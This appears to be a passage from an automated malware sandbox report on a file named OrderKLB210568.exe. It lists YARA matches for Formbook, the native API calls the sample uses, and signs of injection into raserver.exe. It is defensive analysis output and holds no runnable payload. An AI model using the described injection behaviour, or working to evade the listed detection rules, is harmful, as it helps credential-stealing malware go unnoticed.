          Source: 00000000.00000002.667634881.00000000022B0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.667634881.00000000022B0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.922673360.0000000001250000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.922673360.0000000001250000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.720819414.00000000009D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.720819414.00000000009D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.720216113.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.720216113.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.922695254.0000000001280000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.922695254.0000000001280000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.664276844.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.664276844.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.922550809.0000000001000000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.922550809.0000000001000000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.720881114.0000000000A00000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.720881114.0000000000A00000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.OrderKLB210568.exe.22b0000.3.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.OrderKLB210568.exe.22b0000.3.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.OrderKLB210568.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.OrderKLB210568.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.OrderKLB210568.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.OrderKLB210568.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.OrderKLB210568.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.OrderKLB210568.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.OrderKLB210568.exe.22b0000.3.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.OrderKLB210568.exe.22b0000.3.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.OrderKLB210568.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.OrderKLB210568.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious name
          Source: initial sample, Static PE information: Filename: OrderKLB210568.exe
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_004182F0 NtClose,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_0041826A NtReadFile,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00418212 NtReadFile,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_0041839D NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AF98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AF9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AF9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AF99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AF9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AF9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AF9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AF9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AF95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AF9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AF96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AF9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AF97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AF9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AF9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AF9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AF98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AF9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AFB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AF99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AF9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AF9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AF9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AFA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AF9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AF95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AF9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AFAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AF9560 NtWriteFile,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AF96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AF9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AF9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AF9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AF9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AFA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AF9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AF9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AFA770 NtOpenThread,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_1_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_1_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_1_004182F0 NtClose,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_1_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_1_0041826A NtReadFile,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_1_00418212 NtReadFile,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_1_0041839D NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_05139540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_051395D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_05139710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_05139780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_05139FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_05139650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_05139660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_051396D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_051396E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_05139910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_051399A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_05139840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_05139860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_05139A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_0513AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_05139520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_05139560 NtWriteFile,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_051395F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_0513A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_05139730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_0513A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_05139770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_05139760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_051397A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_05139610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_05139670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_05139950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_051399D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_05139820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_0513B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_051398A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_051398F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_05139B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_0513A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_05139A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_05139A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_05139A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_05139A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_010181C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_010183A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_01018270 NtReadFile,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_010182F0 NtClose,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_0101839D NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_01018212 NtReadFile,
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_0101826A NtReadFile,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 0_2_0040323C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 0_2_00404853
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 0_2_00406131
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 0_2_6FC41A98
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00401026
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00401030
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_0041B83E
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_0041C171
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00401208
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00408C60
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_0041C429
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_0041B4A3
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00402D90
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_0041BDB4
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AE20A0
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00B820A8
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00ACB090
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00B828EC
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00B8E824
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00B71002
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AD4120
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00ABF900
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00B822AE
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00B6FA2B
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AEEBB0
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00B7DBD2
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00B703DA
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00B82B28
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AC841F
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00B7D466
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AE2581
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00ACD5E0
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00B825DD
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AB0D20
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00B82D07
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00B81D55
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00B82EF7
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00AD6E30
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00B7D616
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00B81FF1
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_2_00B8DFCE
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_1_00401026
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_1_00401030
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_1_0041B83E
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_1_0041C171
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_1_00401208
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_1_00408C60
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_1_0041C429
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_1_0041B4A3
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_1_00402D90
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: 1_1_0041BDB4
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_051C2D07
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_050F0D20
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_051C1D55
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_05122581
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_051C25DD
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_0510D5E0
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_0510841F
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_051BD466
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_051B4496
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_051CDFCE
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_051C1FF1
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_051BD616
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_05116E30
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_051C2EF7
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_050FF900
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_05114120
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_051199BF
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_051B1002
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_0511A830
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_051CE824
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_0510B090
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_051220A0
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_051C20A8
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_051C28EC
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_0511A309
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_051C2B28
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_0511AB40
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_0512EBB0
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_051B03DA
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_051BDBD2
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_0512ABD8
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_051A23E3
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_051AFA2B
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_051C22AE
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_051B4AEF
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_0101C171
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_0101B83E
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_01002D90
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_0101BDB4
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_0101C429
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_01008C60
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_0101B4A3
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 9_2_01002FB0
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: String function: 050FB150 appears 124 times
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: String function: 00419F70 appears 36 times
          Source: C:\Users\user\Desktop\OrderKLB210568.exe, Code function: String function: 00ABB150 appears 45 times
          Source: OrderKLB210568.exe, 00000000.00000003.660414871.0000000009B46000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs OrderKLB210568.exe
          Source: OrderKLB210568.exe, 00000001.00000002.721198139.0000000000BAF000.00000040.00000001.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs OrderKLB210568.exe
          Source: OrderKLB210568.exe, 00000001.00000002.720949048.0000000000A49000.00000040.00000001.sdmp, Binary or memory string: OriginalFilenameraserver.exej% vs OrderKLB210568.exe
          Source: OrderKLB210568.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000000.00000002.667634881.00000000022B0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.667634881.00000000022B0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.922673360.0000000001250000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.922673360.0000000001250000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.720819414.00000000009D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.720819414.00000000009D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.720216113.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.720216113.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.922695254.0000000001280000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.922695254.0000000001280000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.664276844.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.664276844.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.922550809.0000000001000000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.922550809.0000000001000000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
